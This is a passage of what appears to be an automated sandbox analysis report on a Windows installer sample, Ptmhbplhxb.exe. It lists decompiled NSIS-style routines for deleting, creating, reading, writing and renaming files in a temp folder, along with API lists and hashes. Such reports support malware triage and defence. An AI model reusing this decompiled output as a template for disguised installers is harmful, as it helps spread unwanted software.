                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                • String ID: C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp
                • API String ID: 1892508949-1390092544
                • Opcode ID: 6e9d8b0bdd6535f5ad521cfe25d2546e39bd3477eb11d702e3e3618c9b95e55c
                • Instruction ID: 323619fe81b3529d61600e1e0eff0ce417d4ac591c1c2d39a63079fc07480124
                • Opcode Fuzzy Hash: 6e9d8b0bdd6535f5ad521cfe25d2546e39bd3477eb11d702e3e3618c9b95e55c
                • Instruction Fuzzy Hash: 2B11C431608152EBCB217BA54D415BF2AB4DA96324B28093FE9D1B22E2D63D4D425A2E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004056E5 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 587 4056e5-4056f6 call 405ad9 590 405726 587->590 591 4056f8-4056fe 587->591 594 405728-40572a 590->594 592 405700-405706 RemoveDirectoryA 591->592 593 405708 DeleteFileA 591->593 595 40570e-405710 592->595 593->595 596 405712-405715 595->596 597 405717-40571c 595->597 596->594 597->590 598 40571e-405720 SetFileAttributesA 597->598 598->590
                C-Code - Quality: 41%
                			E004056E5(void* __eflags, CHAR* _a4, signed int _a8) {
				int _t9;
				long _t13;
				CHAR* _t14;

				_t14 = _a4;
				_t13 = E00405AD9(_t14);
				if(_t13 == 0xffffffff) {
					L8:
					return 0;
				}
				_push(_t14);
				if((_a8 & 0x00000001) == 0) {
					_t9 = DeleteFileA(); // executed
				} else {
					_t9 = RemoveDirectoryA(); // executed
				}
				if(_t9 == 0) {
					if((_a8 & 0x00000004) == 0) {
						SetFileAttributesA(_t14, _t13);
					}
					goto L8;
				} else {
					return 1;
				}
			}






                0x004056e6
                0x004056f1
                0x004056f6
                0x00405726
                0x00000000
                0x00405726
                0x004056fd
                0x004056fe
                0x00405708
                0x00405700
                0x00405700
                0x00405700
                0x00405710
                0x0040571c
                0x00405720
                0x00405720
                0x00000000
                0x00405712
                0x00000000
                0x00405714

                APIs
                  • Part of subcall function 00405AD9: GetFileAttributesA.KERNELBASE(?,?,004056F1,?,?,00000000,004058D4,?,?,?,?), ref: 00405ADE
                  • Part of subcall function 00405AD9: SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405AF2
                • RemoveDirectoryA.KERNELBASE(?,?,?,00000000,004058D4), ref: 00405700
                • DeleteFileA.KERNELBASE(?,?,?,00000000,004058D4), ref: 00405708
                • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405720
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: File$Attributes$DeleteDirectoryRemove
                • String ID:
                • API String ID: 1655745494-0
                • Opcode ID: 4390be6e2ef8d2df5986f304b1f187f42b365e072cd754739d21517cc83f2d57
                • Instruction ID: ab3c30a2a51d8520bfc91e36631e3b158bafcebe445a439927c7769123fd08c9
                • Opcode Fuzzy Hash: 4390be6e2ef8d2df5986f304b1f187f42b365e072cd754739d21517cc83f2d57
                • Instruction Fuzzy Hash: E4E0E531115A91D6C2106774AE0865B2AD8EFC6364F05493BF892B30C0DB78880BAA6E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 599 401389-40138e 600 4013fa-4013fc 599->600 601 401390-4013a0 600->601 602 4013fe 600->602 601->602 604 4013a2-4013a3 call 401434 601->604 603 401400-401401 602->603 606 4013a8-4013ad 604->606 607 401404-401409 606->607 608 4013af-4013b7 call 40136d 606->608 607->603 611 4013b9-4013bb 608->611 612 4013bd-4013c2 608->612 613 4013c4-4013c9 611->613 612->613 613->600 614 4013cb-4013f4 MulDiv SendMessageA 613->614 614->600
                C-Code - Quality: 59%
                			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42f450;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42ebec =  *0x42ebec + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42ebec, 0x7530,  *0x42ebd4), 0);
					}
				}
				return 0;
			}











                0x0040138a
                0x004013fa
                0x0040139b
                0x004013a0
                0x00000000
                0x00000000
                0x004013a2
                0x004013a3
                0x004013ad
                0x00000000
                0x00401404
                0x004013b0
                0x004013b7
                0x004013bd
                0x004013be
                0x004013c0
                0x004013c2
                0x004013b9
                0x004013b9
                0x004013ba
                0x004013ba
                0x004013c9
                0x004013cb
                0x004013f4
                0x004013f4
                0x004013c9
                0x00000000

                APIs
                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 99d94b6b7251e12d57a26b250e6e72915567ed6026f147eeb310830d1348a8a6
                • Instruction ID: f90ead50954d10692fd747fd35726c7c61e2fcf071c036ef7d407bcf2d164b43
                • Opcode Fuzzy Hash: 99d94b6b7251e12d57a26b250e6e72915567ed6026f147eeb310830d1348a8a6
                • Instruction Fuzzy Hash: 4601F4317242109BE7199B399D04B6A3698E710719F54823FF852F61F1D678EC028B4C
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004062FD Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004062FD(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a240);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a240));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a244));
				}
				_t5 = E0040628F(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                0x00406305
                0x00406308
                0x0040630f
                0x00406317
                0x00406323
                0x00000000
                0x0040632a
                0x0040631a
                0x00406321
                0x00000000
                0x00406332
                0x00000000

                APIs
                • GetModuleHandleA.KERNEL32(?,?,?,00403264,0000000A), ref: 0040630F
                • GetProcAddress.KERNEL32(00000000,?), ref: 0040632A
                  • Part of subcall function 0040628F: GetSystemDirectoryA.KERNEL32 ref: 004062A6
                  • Part of subcall function 0040628F: wsprintfA.USER32 ref: 004062DF
                  • Part of subcall function 0040628F: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004062F3
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                • String ID:
                • API String ID: 2547128583-0
                • Opcode ID: ec1a34f72467b36b6d3b50eb043fa95794862aef332a9bc5e598c085f3d55eb5
                • Instruction ID: 0a5867ae11c12db0e7684f2d0d3995392d51af775f5f68958dac655171f1c28e
                • Opcode Fuzzy Hash: ec1a34f72467b36b6d3b50eb043fa95794862aef332a9bc5e598c085f3d55eb5
                • Instruction Fuzzy Hash: 83E08C32604221ABD210AB749E0493B63A8EF98740306483EF94AF2240DB3C9C7296A9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405AFE Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                Download Yara Rule
                C-Code - Quality: 68%
                			E00405AFE(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                0x00405b02
                0x00405b0f
                0x00405b24
                0x00405b2a

                APIs
                • GetFileAttributesA.KERNELBASE(00000003,00402D88,C:\Users\user\Desktop\Ptmhbplhxb.exe,80000000,00000003), ref: 00405B02
                • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B24
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: File$AttributesCreate
                • String ID:
                • API String ID: 415043291-0
                • Opcode ID: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
                • Instruction ID: 6905ba7dec075751c4c8bdaf1e97cd52a4ed4154a0977e2bcfee25d1bc4df630
                • Opcode Fuzzy Hash: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
                • Instruction Fuzzy Hash: F5D09E31254201EFEF098F20DE16F2EBBA2EB94B00F11952CB682944E1DA715819AB19
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405AD9 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405AD9(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe); // executed
				}
				return _t7;
			}





                0x00405ade
                0x00405ae4
                0x00405ae9
                0x00405af2
                0x00405af2
                0x00405afb

                APIs
                • GetFileAttributesA.KERNELBASE(?,?,004056F1,?,?,00000000,004058D4,?,?,?,?), ref: 00405ADE
                • SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405AF2
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: d21186c4df97c8b90cedd4d9d2ae0fe59d501b3437fd2b8c2b63dc03c6f7d79a
                • Instruction ID: a8f15113e5c9b75401305b8f42f7b900fd80c9315a1f16fe78aaf2180abbdc87
                • Opcode Fuzzy Hash: d21186c4df97c8b90cedd4d9d2ae0fe59d501b3437fd2b8c2b63dc03c6f7d79a
                • Instruction Fuzzy Hash: B8D0C972504122ABC2102728AE0889BBB55DB54271702CB35F9B9A26B1DB304C56AA98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004036DB Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 11COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004036DB() {
				void* _t1;
				void* _t3;
				signed int _t6;

				_t1 =  *0x40a018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
					_t6 =  *0x40a018;
				}
				E00403720();
				_t3 = E0040572D(_t6, "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\nsq9535.tmp\\", 7); // executed
				return _t3;
			}






                0x004036db
                0x004036e3
                0x004036e6
                0x004036ec
                0x004036ec
                0x004036ec
                0x004036f3
                0x004036ff
                0x00403704

                APIs
                • CloseHandle.KERNEL32(FFFFFFFF,00403512,?,?,00000006,00000008,0000000A), ref: 004036E6
                Strings
                • C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\, xrefs: 004036FA
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: CloseHandle
                • String ID: C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\
                • API String ID: 2962429428-2962041203
                • Opcode ID: 7bb9d04c8b35ddb385cf310f384fb45be282d55caa20868854ffc01acd183563
                • Instruction ID: a1bde45f6d244ba91e802d61d3971a42b11b03c2813ac8242e2f7427b9539a77
                • Opcode Fuzzy Hash: 7bb9d04c8b35ddb385cf310f384fb45be282d55caa20868854ffc01acd183563
                • Instruction Fuzzy Hash: 5DC01270504701A6C5346F74AE4F6093A14AB44735F604725B0B5F21F1CB7C565A556E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004055CF Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004055CF(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                0x004055d5
                0x004055dd
                0x00000000
                0x004055e3
                0x00000000

                APIs
                • CreateDirectoryA.KERNELBASE(?,00000000,004031E4,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 004055D5
                • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004055E3
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: CreateDirectoryErrorLast
                • String ID:
                • API String ID: 1375471231-0
                • Opcode ID: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
                • Instruction ID: ff59ce228810ab0b399ea54ffc24e93d20618ce1ebfa51e1db99450e15aaec59
                • Opcode Fuzzy Hash: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
                • Instruction Fuzzy Hash: FAC08C30200101ABDB010B318F08B073A62AB80380F0288396042E00B4CA308004C92E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405B76 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405B76(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                0x00405b7a
                0x00405b8a
                0x00405b92
                0x00000000
                0x00405b99
                0x00000000
                0x00405b9b

                APIs
                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031A6,00000000,00000000,00402FD0,000000FF,00000004,00000000,00000000,00000000), ref: 00405B8A
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: FileRead
                • String ID:
                • API String ID: 2738559852-0
                • Opcode ID: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
                • Instruction ID: d6e1a33fd195441beba49eedd959afadaf6b56434895abd4101947bffd5346ea
                • Opcode Fuzzy Hash: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
                • Instruction Fuzzy Hash: 21E0EC3221065EABDF10AE559C04AEB7B6CEB05360F004437F915E3150D635F9219BA8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405BA5 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405BA5(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                0x00405ba9
                0x00405bb9
                0x00405bc1
                0x00000000
                0x00405bc8
                0x00000000
                0x00405bca

                APIs
                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040315C,00000000,00415428,000000FF,00415428,000000FF,000000FF,00000004,00000000), ref: 00405BB9
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: FileWrite
                • String ID:
                • API String ID: 3934441357-0
                • Opcode ID: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                • Instruction ID: 823d1a00ca840d25d454e1cdeec80758da7ba5e35e2b738bcb0e321267d0793f
                • Opcode Fuzzy Hash: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                • Instruction Fuzzy Hash: DEE0EC3222075EAFDF50AE559C00AEB7B7CEB05760F004437F925E2190E631F9219BAC
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405D44 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                Download Yara Rule
                C-Code - Quality: 68%
                			E00405D44(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _t5;
				void* _t6;

				_t6 = __ecx;
				_t5 = MoveFileExA(_a4, _a8, 5); // executed
				if(_t5 == 0) {
					_push(_a8);
					_push(_a4);
					_t5 = E00405BD4(_t6);
				}
				 *0x42f4b0 =  *0x42f4b0 + 1;
				return _t5;
			}





                0x00405d44
                0x00405d4e
                0x00405d56
                0x00405d58
                0x00405d5c
                0x00405d60
                0x00405d66
                0x00405d67
                0x00405d6d

                APIs
                • MoveFileExA.KERNEL32 ref: 00405D4E
                  • Part of subcall function 00405BD4: CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405D65,?,?), ref: 00405C05
                  • Part of subcall function 00405BD4: GetShortPathNameA.KERNEL32 ref: 00405C0E
                  • Part of subcall function 00405BD4: GetShortPathNameA.KERNEL32 ref: 00405C2B
                  • Part of subcall function 00405BD4: wsprintfA.USER32 ref: 00405C49
                  • Part of subcall function 00405BD4: GetFileSize.KERNEL32(00000000,00000000,0042CA00,C0000000,00000004,0042CA00,?,?,?,?,?), ref: 00405C84
                  • Part of subcall function 00405BD4: GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405C93
                  • Part of subcall function 00405BD4: lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CCB
                  • Part of subcall function 00405BD4: SetFilePointer.KERNEL32(0040A3B8,00000000,00000000,00000000,00000000,0042C200,00000000,-0000000A,0040A3B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D21
                  • Part of subcall function 00405BD4: GlobalFree.KERNEL32 ref: 00405D32
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: File$GlobalNamePathShort$AllocCloseFreeHandleMovePointerSizelstrcpywsprintf
                • String ID:
                • API String ID: 299535525-0
                • Opcode ID: 357cd734fd2ea1d3f4f601ad3e31a1be9675888ca9e718e542911529a83bbe62
                • Instruction ID: 8264f8fe3c9c578956083b3625533de480bc17291d9062dfb527519968c09de9
                • Opcode Fuzzy Hash: 357cd734fd2ea1d3f4f601ad3e31a1be9675888ca9e718e542911529a83bbe62
                • Instruction Fuzzy Hash: CAD0A932108300BEDB122B20EC08A1BBBB1FF9031AF21C83EF184600B0EB329021DF09
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004031A9 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004031A9(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                0x004031b7
                0x004031bd

                APIs
                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F0F,?), ref: 004031B7
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: FilePointer
                • String ID:
                • API String ID: 973152223-0
